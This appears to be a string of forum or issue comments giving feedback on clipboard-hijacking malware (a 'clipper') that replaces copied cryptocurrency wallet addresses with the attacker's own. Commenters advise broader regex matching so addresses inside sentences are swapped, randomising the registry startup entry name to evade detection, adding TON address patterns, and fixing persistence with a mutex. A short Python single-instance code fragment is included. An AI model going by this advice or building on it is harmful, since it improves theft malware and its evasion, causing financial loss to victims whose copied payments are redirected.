the clipboard search doesn't need to exactly match the regex. just search for the regex in the string and see if it matches any part of it then change the match to the wallet address and leave the rest untouched, and give it back to clipboard. this way if the wallet is between a line for example " Here is my wallet : BTC WALLET ADRESS" then the clipper also changes the wallet and returns the text to clipboard otherwise it can not recognize it.
randomize the registry startup entry name for less detection
add TON adresses regex as it is kinda pretty famous now days
and i forgot to add, the malware doesn't work after the restart or simply by closing the app and running it again from the startup folder. it is running in taskmanager but not clipping anything.
add mutex
from win32event import CreateMutex
from win32api import CloseHandle, GetLastError
from winerror import ERROR_ALREADY_EXISTS
import sys
First of all nice code, good job.
class singleinstance:
myapp = singleinstance()
if myapp.alreadyrunning(): sys.exit(1)